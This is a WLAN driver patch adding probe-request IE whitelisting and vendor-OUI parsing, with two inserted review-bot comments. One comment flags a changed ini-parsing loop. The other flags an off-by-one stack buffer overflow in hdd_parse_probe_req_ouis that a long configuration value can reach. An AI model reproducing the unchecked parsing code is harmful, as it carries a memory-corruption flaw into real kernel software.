REG_VARIABLE_STRING(CFG_PROBE_REQ_OUI_NAME, WLAN_PARAM_String, -+ struct hdd_config, probe_req_ouis, -+ VAR_FLAGS_OPTIONAL, -+ (void *)CFG_PROBE_REQ_OUI_DEFAULT), - }; - - /** -@@ -5898,8 +5966,38 @@ void hdd_cfg_print(hdd_context_t *pHddCtx) - hdd_debug("Name = [%s] Value = [%d]", - CFG_ARP_AC_CATEGORY, - pHddCtx->config->arp_ac_category); --} - -+ hdd_info("Name = [%s] Value = [%x] ", -+ CFG_PRB_REQ_IE_WHITELIST_NAME, -+ pHddCtx->config->probe_req_ie_whitelist); -+ hdd_info("Name = [%s] Value = [%x] ", -+ CFG_PRB_REQ_IE_BIT_MAP0_NAME, -+ pHddCtx->config->probe_req_ie_bitmap_0); -+ hdd_info("Name = [%s] Value = [%x] ", -+ CFG_PRB_REQ_IE_BIT_MAP1_NAME, -+ pHddCtx->config->probe_req_ie_bitmap_1); -+ hdd_info("Name = [%s] Value = [%x] ", -+ CFG_PRB_REQ_IE_BIT_MAP2_NAME, -+ pHddCtx->config->probe_req_ie_bitmap_2); -+ hdd_info("Name = 
[%s] Value = [%x] ", -+ CFG_PRB_REQ_IE_BIT_MAP3_NAME, -+ pHddCtx->config->probe_req_ie_bitmap_3); -+ hdd_info("Name = [%s] Value = [%x] ", -+ CFG_PRB_REQ_IE_BIT_MAP4_NAME, -+ pHddCtx->config->probe_req_ie_bitmap_4); -+ hdd_info("Name = [%s] Value = [%x] ", -+ CFG_PRB_REQ_IE_BIT_MAP5_NAME, -+ pHddCtx->config->probe_req_ie_bitmap_5); -+ hdd_info("Name = [%s] Value = [%x] ", -+ CFG_PRB_REQ_IE_BIT_MAP6_NAME, -+ pHddCtx->config->probe_req_ie_bitmap_6); -+ hdd_info("Name = [%s] Value = [%x] ", -+ CFG_PRB_REQ_IE_BIT_MAP7_NAME, -+ pHddCtx->config->probe_req_ie_bitmap_7); -+ hdd_info("Name = [%s] Value =[%s]", -+ CFG_PROBE_REQ_OUI_NAME, -+ pHddCtx->config->probe_req_ouis); -+} - - /** - * hdd_update_mac_config() - update MAC address from cfg file -@@ -6160,8 +6258,7 @@ QDF_STATUS hdd_parse_config_ini(hdd_context_t *pHddCtx) - buffer = i_trim(buffer); - if (strlen(buffer) > 0) { - value = buffer; -- while (!i_isspace(*buffer) -- && *buffer != '\0') -+ while (*buffer != '\0') - buffer++; - *buffer = '\0'; - cfgIniTable[i].name = name; -@@ -7682,3 +7779,183 @@ QDF_STATUS hdd_update_nss(hdd_context_t *hdd_ctx, uint8_t nss) - - return (status == false) ? 
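Review bot: Dropping the `!i_isspace(*buffer)` test in hdd_parse_config_ini changes value parsing for every key in the ini file, not only `gProbeReqOUIs`. A value now runs to the end of the line, so text after the first space that used to be cut off becomes part of it. What remains of the loop only walks to the terminator, and the following `*buffer = '\0';` overwrites a byte that is already NUL, so both are dead code. If whole-line values are intended, I would delete the loop and the assignment and add a comment such as `/* value is the rest of the line after i_trim(); embedded spaces are kept (needed for gProbeReqOUIs) */`. The rest of the function is outside the hunk.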
QDF_STATUS_E_FAILURE : QDF_STATUS_SUCCESS; - } -+ -+bool hdd_validate_prb_req_ie_bitmap(hdd_context_t *hdd_ctx) -+{ -+ if (!(hdd_ctx->config->probe_req_ie_bitmap_0 || -+ hdd_ctx->config->probe_req_ie_bitmap_1 || -+ hdd_ctx->config->probe_req_ie_bitmap_2 || -+ hdd_ctx->config->probe_req_ie_bitmap_3 || -+ hdd_ctx->config->probe_req_ie_bitmap_4 || -+ hdd_ctx->config->probe_req_ie_bitmap_5 || -+ hdd_ctx->config->probe_req_ie_bitmap_6 || -+ hdd_ctx->config->probe_req_ie_bitmap_7)) -+ return false; -+ -+ /* -+ * check whether vendor oui IE is set and OUIs are present, each OUI -+ * is entered in the form of string of 8 characters from ini, therefore, -+ * for atleast one OUI, minimum length is 8 and hence this string length -+ * is checked for minimum of 8 -+ */ -+ if ((hdd_ctx->config->probe_req_ie_bitmap_6 & -+ VENDOR_SPECIFIC_IE_BITMAP) && -+ (strlen(hdd_ctx->config->probe_req_ouis) < 8)) -+ return false; -+ -+ /* check whether vendor oui IE is not set but OUIs are present */ -+ if (!(hdd_ctx->config->probe_req_ie_bitmap_6 & -+ VENDOR_SPECIFIC_IE_BITMAP) && -+ (strlen(hdd_ctx->config->probe_req_ouis) > 0)) -+ return false; -+ -+ return true; -+} -+ -+/** -+ * probe_req_voui_convert_to_hex - converts str of 8 chars into two hex values -+ * @temp: string to be converted -+ * @voui: contains the type and subtype values -+ * -+ * This function converts the string length of 8 characters into two -+ * hexa-decimal values, oui_type and oui_subtype, where oui_type is the -+ * hexa decimal value converted from first 6 characters and oui_subtype is -+ * hexa decimal value converted from last 2 characters. -+ * strings which doesn't match with the specified pattern are ignored. 
-+ * -+ * Return: status of conversion -+ * true - if conversion is successful -+ * false - if conversion is failed -+ */ -+static bool hdd_probe_req_voui_convert_to_hex(uint8_t *temp, -+ struct vendor_oui *voui) -+{ -+ uint32_t hex_value[4] = {0}; -+ uint32_t i = 0; -+ uint32_t indx = 0; -+ -+ memset(voui, 0x00, sizeof(*voui)); -+ -+ /* convert string to hex */ -+ for (i = 0; i < 8; i++) { -+ if (temp[i] >= '0' && temp[i] <= '9') { -+ hex_value[indx] = (temp[i] - '0') << 4; -+ } else if (temp[i] >= 'A' && temp[i] <= 'F') { -+ hex_value[indx] = (temp[i] - 'A') + 0xA; -+ hex_value[indx] = hex_value[indx] << 4; -+ } else { -+ /* invalid character in oui */ -+ return false; -+ } -+ -+ if (temp[i + 1] >= '0' && temp[i + 1] <= '9') { -+ hex_value[indx] |= (temp[i + 1] - '0'); -+ i = i + 1; -+ indx = indx + 1; -+ } else if (temp[i + 1] >= 'A' && temp[i + 1] <= 'F') { -+ hex_value[indx] |= ((temp[i + 1] - 'A') + 0xA); -+ i = i + 1; -+ indx = indx + 1; -+ } else { -+ /* invalid character in oui */ -+ return false; -+ } -+ } -+ -+ voui->oui_type = (hex_value[0] | (hex_value[1] << 8) | -+ (hex_value[2] << 16)); -+ voui->oui_subtype = hex_value[3]; -+ -+ hdd_info("OUI_type = %x and OUI_subtype = %x", -+ voui->oui_type, voui->oui_subtype); -+ -+ return true; -+} -+ -+int hdd_parse_probe_req_ouis(hdd_context_t *hdd_ctx) -+{ -+ struct vendor_oui voui[MAX_PROBE_REQ_OUIS]; -+ uint8_t *str; -+ uint8_t temp[9]; -+ uint32_t start = 0, end = 0; -+ uint32_t oui_indx = 0; -+ uint32_t i = 0; -+ -+ hdd_ctx->config->probe_req_ouis[MAX_PRB_REQ_VENDOR_OUI_INI_LEN - 1] = -+ '\0'; -+ if (!strlen(hdd_ctx->config->probe_req_ouis)) { -+ hdd_ctx->no_of_probe_req_ouis = 0; -+ hdd_ctx->probe_req_voui = NULL; -+ hdd_info("NO OUIS to parse"); -+ return 0; -+ } -+ -+ str = (uint8_t *)(hdd_ctx->config->probe_req_ouis); -+ -+ while (str[i] != '\0') { -+ if (str[i] == ' ') { -+ if ((end - start) != 8) { -+ end = start = 0; -+ i++; -+ continue; -+ } else { -+ memcpy(temp, &str[i - 8], 8); -+ i++; -+ 
temp[8] = '\0'; -+ if (hdd_probe_req_voui_convert_to_hex(temp, -+ &voui[oui_indx]) == 0) { -+ continue; -+ } -+ oui_indx++; -+ if (oui_indx > MAX_PROBE_REQ_OUIS) { -+ /* -+ * Max number of OUIs supported is 16, -+ * ignoring the rest -+ */ -+ hdd_info("Max OUIs-supported: 16"); -+ return 0; -+ } -+ } -+ start = end = 0; -+ } else { -+ i++; -+ end++; -+ } -+ } -+ -+ if ((end - start) == 8) { -+ memcpy(temp, &str[i - 8], 8); -+ temp[8] = '\0'; -+ if (hdd_probe_req_voui_convert_to_hex(temp, -+ &voui[oui_indx]) == 1) -+ oui_indx++; -+ } -+ -+ if (!oui_indx) -+ return 0; -+ -+ hdd_ctx->probe_req_voui = qdf_mem_malloc(oui_indx * -+ sizeof(*hdd_ctx->probe_req_voui)); -+ if (hdd_ctx->probe_req_voui == NULL) { -+ hdd_err("Not Enough memory for OUI"); -+ hdd_ctx->no_of_probe_req_ouis = 0; -+ return -ENOMEM; -+ } -+ hdd_ctx->no_of_probe_req_ouis = oui_indx; -+ qdf_mem_copy(hdd_ctx->probe_req_voui, voui, -+ oui_indx * sizeof(*hdd_ctx->probe_req_voui)); -+ -+ return 0; -+} -+ -+void hdd_free_probe_req_ouis(hdd_context_t *hdd_ctx) -+{ -+ struct vendor_oui *probe_req_voui = hdd_ctx->probe_req_voui; -+ -+ if (probe_req_voui) { -+ hdd_ctx->probe_req_voui = NULL; -+ qdf_mem_free(probe_req_voui); -+ } -+ -+ hdd_ctx->no_of_probe_req_ouis = 0; -+} -diff --git a/core/hdd/src/wlan_hdd_cfg80211.c b/core/hdd/src/wlan_hdd_cfg80211.c -index 2f3a7f9..836d6dc 100644 ---- a/core/hdd/src/wlan_hdd_cfg80211.c -+++ b/core/hdd/src/wlan_hdd_cfg80211.c -@@ -1987,7 +1987,10 @@ __wlan_hdd_cfg80211_set_scanning_mac_oui(struct wiphy *wiphy, - hdd_err("Invalid ATTR"); - return -EINVAL; - } -- pReqMsg = qdf_mem_malloc(sizeof(*pReqMsg)); -+ pReqMsg = qdf_mem_malloc(sizeof(*pReqMsg) + -+ (pHddCtx->no_of_probe_req_ouis) * -+ (sizeof(struct vendor_oui))); -+ - if (!pReqMsg) { - hdd_err("qdf_mem_malloc failed"); - return -ENOMEM; -@@ -2006,6 +2009,15 @@ __wlan_hdd_cfg80211_set_scanning_mac_oui(struct wiphy *wiphy, - - hdd_debug("Oui (%02x:%02x:%02x), vdev_id = %d", pReqMsg->oui[0], - pReqMsg->oui[1], 
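Review bot: hdd_parse_probe_req_ouis can write one element past the local `voui[MAX_PROBE_REQ_OUIS]` array. The in-loop limit test runs after the store and uses `>`, so with 16 entries filled `oui_indx > MAX_PROBE_REQ_OUIS` is still false and the next token is converted into `voui[16]`; the trailing `(end - start) == 8` block has no limit test at all. The ini buffer holds up to 159 characters, enough for 17 eight-character tokens, so a configuration value can reach this. I would test the index before each store, with `if (oui_indx >= MAX_PROBE_REQ_OUIS) break;` ahead of the in-loop `hdd_probe_req_voui_convert_to_hex()` call and `&& oui_indx < MAX_PROBE_REQ_OUIS` added to the trailing condition. Leaving with `break` instead of `return 0` also keeps the entries already parsed, which the current early return drops before the allocation.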
pReqMsg->oui[2], pReqMsg->vdev_id);
-+
-+ if (pHddCtx->config->probe_req_ie_whitelist)
-+ wlan_hdd_fill_whitelist_ie_attrs(&pReqMsg->ie_whitelist,
-+ pReqMsg->probe_req_ie_bitmap,
-+ &pReqMsg->num_vendor_oui,
-+ (struct vendor_oui *)((uint8_t *)pReqMsg +
-+ sizeof(*pReqMsg)),
-+ pHddCtx);
-+
- status = sme_set_scanning_mac_oui(pHddCtx->hHal, pReqMsg);
- if (!QDF_IS_STATUS_SUCCESS(status)) {
- hdd_err("sme_set_scanning_mac_oui failed(err=%d)", status);
-diff --git a/core/hdd/src/wlan_hdd_main.c b/core/hdd/src/wlan_hdd_main.c
-index c726f88..103f529 100644
---- a/core/hdd/src/wlan_hdd_main.c
-+++ b/core/hdd/src/wlan_hdd_main.c
-@@ -4993,6 +4993,8 @@ static void hdd_context_destroy(hdd_context_t *hdd_ctx)
-
- hdd_context_deinit(hdd_ctx);
-
-+ hdd_free_probe_req_ouis(hdd_ctx);
-+
- qdf_mem_free(hdd_ctx->config);
- hdd_ctx->config = NULL;
-
-@@ -6875,6 +6877,21 @@ static hdd_context_t *hdd_context_create(struct device *dev)
- hdd_debug("Setting configuredMcastBcastFilter: %d",
- hdd_ctx->config->mcastBcastFilterSetting);
-
-+ if (hdd_ctx->config->probe_req_ie_whitelist) {
-+ if (hdd_validate_prb_req_ie_bitmap(hdd_ctx)) {
-+ /* parse ini string probe req oui */
-+ if (hdd_parse_probe_req_ouis(hdd_ctx)) {
-+ hdd_err("Error parsing probe req ouis");
-+ hdd_err("disable probe req ie whitelisting");
-+ hdd_ctx->config->probe_req_ie_whitelist = false;
-+ }
-+ } else {
-+ hdd_err("invalid probe req ie bitmap and ouis");
-+ hdd_err("disable probe req ie whitelisting");
-+ hdd_ctx->config->probe_req_ie_whitelist = false;
-+ }
-+ }
-+
- if (hdd_ctx->config->fhostNSOffload)
- hdd_ctx->ns_offload_enable = true;
-
-@@ -6934,6 +6951,7 @@ err_free_config:
- qdf_mem_free(hdd_ctx->config);
-
- err_free_hdd_context:
-+ hdd_free_probe_req_ouis(hdd_ctx);
- wiphy_free(hdd_ctx->wiphy);
-
- err_out:
-diff --git a/core/hdd/src/wlan_hdd_power.c b/core/hdd/src/wlan_hdd_power.c
-index 8b48f42..5e3ecb2 100644
---- a/core/hdd/src/wlan_hdd_power.c
-+++ b/core/hdd/src/wlan_hdd_power.c
-@@ -1673,6
+1673,8 @@ err_wiphy_unregister:
- ptt_sock_deactivate_svc();
- nl_srv_exit();
-
-+ hdd_free_probe_req_ouis(pHddCtx);
-+
- /* Free up dynamically allocated members inside HDD Adapter */
- qdf_mem_free(pHddCtx->config);
- pHddCtx->config = NULL;
-diff --git a/core/hdd/src/wlan_hdd_scan.c b/core/hdd/src/wlan_hdd_scan.c
-index 84b14ed..1f97c66 100644
---- a/core/hdd/src/wlan_hdd_scan.c
-+++ b/core/hdd/src/wlan_hdd_scan.c
-@@ -1557,6 +1557,7 @@ static int __wlan_hdd_cfg80211_scan(struct wiphy *wiphy,
- hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
- hdd_context_t *pHddCtx = WLAN_HDD_GET_CTX(pAdapter);
- hdd_wext_state_t *pwextBuf = WLAN_HDD_GET_WEXT_STATE_PTR(pAdapter);
-+ hdd_station_ctx_t *station_ctx = WLAN_HDD_GET_STATION_CTX_PTR(pAdapter);
- struct hdd_config *cfg_param = NULL;
- tCsrScanRequest scan_req;
- uint8_t *channelList = NULL, i;
-@@ -1970,6 +1971,27 @@ static int __wlan_hdd_cfg80211_scan(struct wiphy *wiphy,
- wlan_hdd_update_scan_rand_attrs((void *)&scan_req, (void *)request,
- WLAN_HDD_HOST_SCAN);
-
-+ if (!hdd_conn_is_connected(station_ctx) &&
-+ (pHddCtx->config->probe_req_ie_whitelist)) {
-+ if (pHddCtx->no_of_probe_req_ouis != 0) {
-+ scan_req.voui = qdf_mem_malloc(
-+ pHddCtx->no_of_probe_req_ouis *
-+ sizeof(struct vendor_oui));
-+ if (!scan_req.voui) {
-+ hdd_info("Not enough memory for voui");
-+ scan_req.num_vendor_oui = 0;
-+ status = -ENOMEM;
-+ goto free_mem;
-+ }
-+ }
-+
-+ wlan_hdd_fill_whitelist_ie_attrs(&scan_req.ie_whitelist,
-+ scan_req.probe_req_ie_bitmap,
-+ &scan_req.num_vendor_oui,
-+ scan_req.voui,
-+ pHddCtx);
-+ }
-+
- qdf_runtime_pm_prevent_suspend(&pHddCtx->runtime_context.scan);
- status = sme_scan_request(WLAN_HDD_GET_HAL_CTX(pAdapter),
- pAdapter->sessionId, &scan_req,
-@@ -2005,6 +2027,9 @@ free_mem:
- if (status == 0)
- scan_ebusy_cnt = 0;
-
-+ if (scan_req.voui)
-+ qdf_mem_free(scan_req.voui);
-+
- EXIT();
- return status;
- }
-@@ -2796,6 +2821,7 @@ static int __wlan_hdd_cfg80211_sched_scan_start(struct wiphy
*wiphy,
- hdd_scaninfo_t *pScanInfo = &pAdapter->scan_info;
- struct hdd_config *config = NULL;
- uint32_t num_ignore_dfs_ch = 0;
-+ hdd_station_ctx_t *station_ctx = WLAN_HDD_GET_STATION_CTX_PTR(pAdapter);
-
- ENTER();
-
-@@ -2853,7 +2879,15 @@ static int __wlan_hdd_cfg80211_sched_scan_start(struct wiphy *wiphy,
- }
- }
-
-- pPnoRequest = (tpSirPNOScanReq) qdf_mem_malloc(sizeof(tSirPNOScanReq));
-+ if (!hdd_conn_is_connected(station_ctx) &&
-+ (pHddCtx->config->probe_req_ie_whitelist))
-+ pPnoRequest =
-+ (tpSirPNOScanReq)qdf_mem_malloc(sizeof(tSirPNOScanReq) +
-+ (pHddCtx->no_of_probe_req_ouis) *
-+ (sizeof(struct vendor_oui)));
-+ else
-+ pPnoRequest = qdf_mem_malloc(sizeof(tSirPNOScanReq));
-+
- if (NULL == pPnoRequest) {
- hdd_err("qdf_mem_malloc failed");
- return -ENOMEM;
-@@ -3013,6 +3047,16 @@ static int __wlan_hdd_cfg80211_sched_scan_start(struct wiphy *wiphy,
- wlan_hdd_update_scan_rand_attrs((void *)pPnoRequest, (void *)request,
- WLAN_HDD_PNO_SCAN);
-
-+ if (pHddCtx->config->probe_req_ie_whitelist &&
-+ !hdd_conn_is_connected(station_ctx))
-+ wlan_hdd_fill_whitelist_ie_attrs(&pPnoRequest->ie_whitelist,
-+ pPnoRequest->probe_req_ie_bitmap,
-+ &pPnoRequest->num_vendor_oui,
-+ (struct vendor_oui *)(
-+ (uint8_t *)pPnoRequest +
-+ sizeof(*pPnoRequest)),
-+ pHddCtx);
-+
- status = sme_set_preferred_network_list(WLAN_HDD_GET_HAL_CTX(pAdapter),
- pPnoRequest,
- pAdapter->sessionId,
-@@ -3322,3 +3366,33 @@ int hdd_scan_context_init(hdd_context_t *hdd_ctx)
-
- return 0;
- }
-+
-+void wlan_hdd_fill_whitelist_ie_attrs(bool *ie_whitelist,
-+ uint32_t *probe_req_ie_bitmap,
-+ uint32_t *num_vendor_oui,
-+ struct vendor_oui *voui,
-+ hdd_context_t *hdd_ctx)
-+{
-+ uint32_t i = 0;
-+
-+ *ie_whitelist = true;
-+ probe_req_ie_bitmap[0] = hdd_ctx->config->probe_req_ie_bitmap_0;
-+ probe_req_ie_bitmap[1] = hdd_ctx->config->probe_req_ie_bitmap_1;
-+ probe_req_ie_bitmap[2] = hdd_ctx->config->probe_req_ie_bitmap_2;
-+ probe_req_ie_bitmap[3] =
hdd_ctx->config->probe_req_ie_bitmap_3;
-+ probe_req_ie_bitmap[4] = hdd_ctx->config->probe_req_ie_bitmap_4;
-+ probe_req_ie_bitmap[5] = hdd_ctx->config->probe_req_ie_bitmap_5;
-+ probe_req_ie_bitmap[6] = hdd_ctx->config->probe_req_ie_bitmap_6;
-+ probe_req_ie_bitmap[7] = hdd_ctx->config->probe_req_ie_bitmap_7;
-+
-+ *num_vendor_oui = 0;
-+
-+ if ((hdd_ctx->no_of_probe_req_ouis != 0) && (voui != NULL)) {
-+ *num_vendor_oui = hdd_ctx->no_of_probe_req_ouis;
-+ for (i = 0; i < hdd_ctx->no_of_probe_req_ouis; i++) {
-+ voui[i].oui_type = hdd_ctx->probe_req_voui[i].oui_type;
-+ voui[i].oui_subtype =
-+ hdd_ctx->probe_req_voui[i].oui_subtype;
-+ }
-+ }
-+}
-diff --git a/core/hdd/src/wlan_hdd_scan.h b/core/hdd/src/wlan_hdd_scan.h
-index 96c96f4..49cce33 100644
---- a/core/hdd/src/wlan_hdd_scan.h
-+++ b/core/hdd/src/wlan_hdd_scan.h
-@@ -129,5 +129,24 @@ void hdd_cleanup_scan_queue(hdd_context_t *hdd_ctx);
- void wlan_hdd_cfg80211_abort_scan(struct wiphy *wiphy,
- struct wireless_dev *wdev);
- #endif
--#endif /* end #if !defined(WLAN_HDD_SCAN_H) */
-
-+/**
-+ * wlan_hdd_fill_whitelist_ie_attrs - fill the white list members
-+ * @ie_whitelist: enables whitelist
-+ * @probe_req_ie_bitmap: bitmap to be filled
-+ * @num_vendor_oui: pointer to no of ouis
-+ * @voui: pointer to ouis to be filled
-+ * @hdd_ctx: pointer to hdd ctx
-+ *
-+ * This function fills the ie bitmap and vendor oui fields with the
-+ * corresponding values present in config and hdd_ctx
-+ *
-+ * Return: None
-+ */
-+void wlan_hdd_fill_whitelist_ie_attrs(bool *ie_whitelist,
-+ uint32_t *probe_req_ie_bitmap,
-+ uint32_t *num_vendor_oui,
-+ struct vendor_oui *voui,
-+ hdd_context_t *hdd_ctx);
-+
-+#endif /* end #if !defined(WLAN_HDD_SCAN_H) */
-diff --git a/core/mac/inc/sir_api.h b/core/mac/inc/sir_api.h
-index f414035..644b8a8 100644
---- a/core/mac/inc/sir_api.h
-+++ b/core/mac/inc/sir_api.h
-@@ -910,6 +910,13 @@ typedef struct sSirSmeScanReq {
- uint8_t mac_addr[QDF_MAC_ADDR_SIZE];
- uint8_t
mac_addr_mask[QDF_MAC_ADDR_SIZE];
-
-+ /* probe req ie whitelisting attrs */
-+ bool ie_whitelist;
-+ uint32_t probe_req_ie_bitmap[PROBE_REQ_BITMAP_LEN];
-+ uint32_t num_vendor_oui;
-+ uint32_t oui_field_len;
-+ uint32_t oui_field_offset;
-+
- /* channelList MUST be the last field of this structure */
- tSirChannelList channelList;
- /*-----------------------------
-@@ -928,7 +935,10 @@ typedef struct sSirSmeScanReq {
- ----------------------------- <--+
- ... variable size uIEFiled
- up to uIEFieldLen (can be 0)
-- -----------------------------*/
-+ -----------------------------
-+ ... variable size upto num_vendor_oui
-+ struct vendor_oui voui;
-+ -----------------------------------*/
- } tSirSmeScanReq, *tpSirSmeScanReq;
-
- typedef struct sSirSmeScanAbortReq {
-@@ -2972,6 +2982,12 @@ typedef struct sSirPNOScanReq {
- bool relative_rssi_set;
- int8_t relative_rssi;
- struct connected_pno_band_rssi_pref band_rssi_pref;
-+
-+ /* probe req ie whitelisting attrs */
-+ bool ie_whitelist;
-+ uint32_t probe_req_ie_bitmap[PROBE_REQ_BITMAP_LEN];
-+ uint32_t num_vendor_oui;
-+ /* followed by one or more struct vendor_oui */
- } tSirPNOScanReq, *tpSirPNOScanReq;
-
- /* Preferred Network Found Indication */
-@@ -3819,6 +3835,13 @@ typedef struct sSirScanOffloadReq {
- uint8_t mac_addr[QDF_MAC_ADDR_SIZE];
- uint8_t mac_addr_mask[QDF_MAC_ADDR_SIZE];
-
-+ /* probe req ie whitelisting attrs */
-+ bool ie_whitelist;
-+ uint32_t probe_req_ie_bitmap[PROBE_REQ_BITMAP_LEN];
-+ uint32_t num_vendor_oui;
-+ uint32_t oui_field_len;
-+ uint32_t oui_field_offset;
-+
- tSirChannelList channelList;
- /*-----------------------------
- sSirScanOffloadReq....
-@@ -3836,7 +3859,10 @@ typedef struct sSirScanOffloadReq {
- ----------------------------- <--+
- ... variable size uIEField
- up to uIEFieldLen (can be 0)
-- -----------------------------*/
-+ -----------------------------
-+ ...
variable size upto num_vendor_oui
-+ struct vendor_oui voui;
-+ ------------------------*/
- } tSirScanOffloadReq, *tpSirScanOffloadReq;
-
- /**
-@@ -4999,6 +5025,11 @@ typedef struct {
- uint8_t oui[WIFI_SCANNING_MAC_OUI_LENGTH];
- uint32_t vdev_id;
- bool enb_probe_req_sno_randomization;
-+ /* probe req ie whitelisting attrs */
-+ bool ie_whitelist;
-+ uint32_t probe_req_ie_bitmap[PROBE_REQ_BITMAP_LEN];
-+ uint32_t num_vendor_oui;
-+ /* Followed by 0 or more struct vendor_oui */
- } tSirScanMacOui, *tpSirScanMacOui;
-
- enum {
-diff --git a/core/mac/src/pe/lim/lim_process_sme_req_messages.c b/core/mac/src/pe/lim/lim_process_sme_req_messages.c
-index 4c653fb..0703dec 100644
---- a/core/mac/src/pe/lim/lim_process_sme_req_messages.c
-+++ b/core/mac/src/pe/lim/lim_process_sme_req_messages.c
-@@ -1222,7 +1222,6 @@ static QDF_STATUS lim_send_hal_start_scan_offload_req(tpAniSirGlobal pMac,
- uint8_t *p;
- tSirMsgQ msg;
- uint16_t i, len;
-- uint16_t addn_ie_len = 0;
- tSirRetStatus status, rc = eSIR_SUCCESS;
- tDot11fIEExtCap extracted_extcap = {0};
- bool extcap_present = true;
-@@ -1255,7 +1254,7 @@ static QDF_STATUS lim_send_hal_start_scan_offload_req(tpAniSirGlobal pMac,
- */
- len = sizeof(tSirScanOffloadReq) +
- (pScanReq->channelList.numChannels - 1) +
-- pScanReq->uIEFieldLen;
-+ pScanReq->uIEFieldLen + pScanReq->oui_field_len;
-
- pScanOffloadReq = qdf_mem_malloc(len);
- if (NULL == pScanOffloadReq) {
-@@ -1335,8 +1334,8 @@ static QDF_STATUS lim_send_hal_start_scan_offload_req(tpAniSirGlobal pMac,
- p[i] = pScanReq->channelList.channelNumber[i];
-
- pScanOffloadReq->uIEFieldLen = pScanReq->uIEFieldLen;
-- pScanOffloadReq->uIEFieldOffset = len - addn_ie_len -
-- pScanOffloadReq->uIEFieldLen;
-+ pScanOffloadReq->uIEFieldOffset = len - pScanOffloadReq->uIEFieldLen -
-+ pScanReq->oui_field_len;
- qdf_mem_copy((uint8_t *) pScanOffloadReq +
- pScanOffloadReq->uIEFieldOffset,
- (uint8_t *) pScanReq + pScanReq->uIEFieldOffset,
-@@ -1351,6 +1350,23 @@ static QDF_STATUS
lim_send_hal_start_scan_offload_req(tpAniSirGlobal pMac,
- pScanReq->mac_addr_mask, QDF_MAC_ADDR_SIZE);
- }
-
-+ pScanOffloadReq->oui_field_len = pScanReq->oui_field_len;
-+ pScanOffloadReq->num_vendor_oui = pScanReq->num_vendor_oui;
-+ pScanOffloadReq->ie_whitelist = pScanReq->ie_whitelist;
-+ if (pScanOffloadReq->ie_whitelist)
-+ qdf_mem_copy(pScanOffloadReq->probe_req_ie_bitmap,
-+ pScanReq->probe_req_ie_bitmap,
-+ PROBE_REQ_BITMAP_LEN * sizeof(uint32_t));
-+ pScanOffloadReq->oui_field_offset = sizeof(tSirScanOffloadReq) +
-+ (pScanOffloadReq->channelList.numChannels - 1) +
-+ pScanOffloadReq->uIEFieldLen;
-+ if (pScanOffloadReq->num_vendor_oui != 0) {
-+ qdf_mem_copy(
-+ (uint8_t *) pScanOffloadReq + pScanOffloadReq->oui_field_offset,
-+ (uint8_t *) pScanReq + pScanReq->oui_field_offset,
-+ pScanReq->oui_field_len);
-+ }
-+
- rc = wma_post_ctrl_msg(pMac, &msg);
- if (rc != eSIR_SUCCESS) {
- lim_log(pMac, LOGE, FL("wma_post_ctrl_msg() return failure"));
-diff --git a/core/sme/inc/csr_api.h b/core/sme/inc/csr_api.h
-index 788e688..211d489 100644
---- a/core/sme/inc/csr_api.h
-+++ b/core/sme/inc/csr_api.h
-@@ -297,6 +297,12 @@ typedef struct tagCsrScanRequest {
- bool enable_scan_randomization;
- uint8_t mac_addr[QDF_MAC_ADDR_SIZE];
- uint8_t mac_addr_mask[QDF_MAC_ADDR_SIZE];
-+
-+ /* probe req ie whitelisting attrs */
-+ bool ie_whitelist;
-+ uint32_t probe_req_ie_bitmap[PROBE_REQ_BITMAP_LEN];
-+ uint32_t num_vendor_oui;
-+ struct vendor_oui *voui;
- } tCsrScanRequest;
-
- typedef struct tagCsrScanResultInfo {
-diff --git a/core/sme/src/common/sme_power_save.c b/core/sme/src/common/sme_power_save.c
-index 4ded194..298e0b5 100644
---- a/core/sme/src/common/sme_power_save.c
-+++ b/core/sme/src/common/sme_power_save.c
-@@ -771,14 +771,19 @@ QDF_STATUS sme_set_ps_preferred_network_list(tHalHandle hal_ctx,
- return QDF_STATUS_E_FAILURE;
- }
-
-- request_buf = qdf_mem_malloc(sizeof(tSirPNOScanReq));
-+ request_buf = qdf_mem_malloc(sizeof(tSirPNOScanReq) +
-+
(request->num_vendor_oui) *
-+ (sizeof(struct vendor_oui)));
-+
- if (NULL == request_buf) {
- QDF_TRACE(QDF_MODULE_ID_SME, QDF_TRACE_LEVEL_ERROR,
- FL("Not able to allocate memory for PNO request"));
- return QDF_STATUS_E_NOMEM;
- }
-
-- qdf_mem_copy(request_buf, request, sizeof(tSirPNOScanReq));
-+ qdf_mem_copy(request_buf, request, sizeof(tSirPNOScanReq) +
-+ (request->num_vendor_oui) *
-+ (sizeof(struct vendor_oui)));
-
- /*Must translate the mode first */
- uc_dot11_mode = (uint8_t) csr_translate_to_wni_cfg_dot11_mode(mac_ctx,
-diff --git a/core/sme/src/csr/csr_api_scan.c b/core/sme/src/csr/csr_api_scan.c
-index bb53967..a810f14 100644
---- a/core/sme/src/csr/csr_api_scan.c
-+++ b/core/sme/src/csr/csr_api_scan.c
-@@ -5066,7 +5066,8 @@ static QDF_STATUS csr_send_mb_scan_req(tpAniSirGlobal pMac, uint16_t sessionId,
- sizeof(pMsg->channelList.channelNumber) +
- (sizeof(pMsg->channelList.channelNumber) *
- pScanReq->ChannelInfo.numOfChannels)) +
-- (pScanReq->uIEFieldLen);
-+ (pScanReq->uIEFieldLen) +
-+ pScanReq->num_vendor_oui * sizeof(*pScanReq->voui);
-
- pMsg = qdf_mem_malloc(msgLen);
- if (NULL == pMsg) {
-@@ -5237,6 +5238,26 @@ static QDF_STATUS csr_send_mb_scan_req(tpAniSirGlobal pMac, uint16_t sessionId,
- QDF_MAC_ADDR_SIZE);
- }
-
-+ pMsg->ie_whitelist = pScanReq->ie_whitelist;
-+ if (pMsg->ie_whitelist)
-+ qdf_mem_copy(pMsg->probe_req_ie_bitmap,
-+ pScanReq->probe_req_ie_bitmap,
-+ PROBE_REQ_BITMAP_LEN * sizeof(uint32_t));
-+ pMsg->num_vendor_oui = pScanReq->num_vendor_oui;
-+ pMsg->oui_field_len = pScanReq->num_vendor_oui *
-+ sizeof(*pScanReq->voui);
-+ pMsg->oui_field_offset = (sizeof(tSirSmeScanReq) -
-+ sizeof(pMsg->channelList.channelNumber) +
-+ (sizeof(pMsg->channelList.channelNumber) *
-+ pScanReq->ChannelInfo.numOfChannels)) +
-+ pScanReq->uIEFieldLen;
-+
-+ if (pScanReq->num_vendor_oui != 0) {
-+ qdf_mem_copy((uint8_t *)pMsg + pMsg->oui_field_offset,
-+ (uint8_t *)(pScanReq->voui),
-+ pMsg->oui_field_len);
-+ }
-+
- send_scan_req:
-
sms_log(pMac, LOGD,
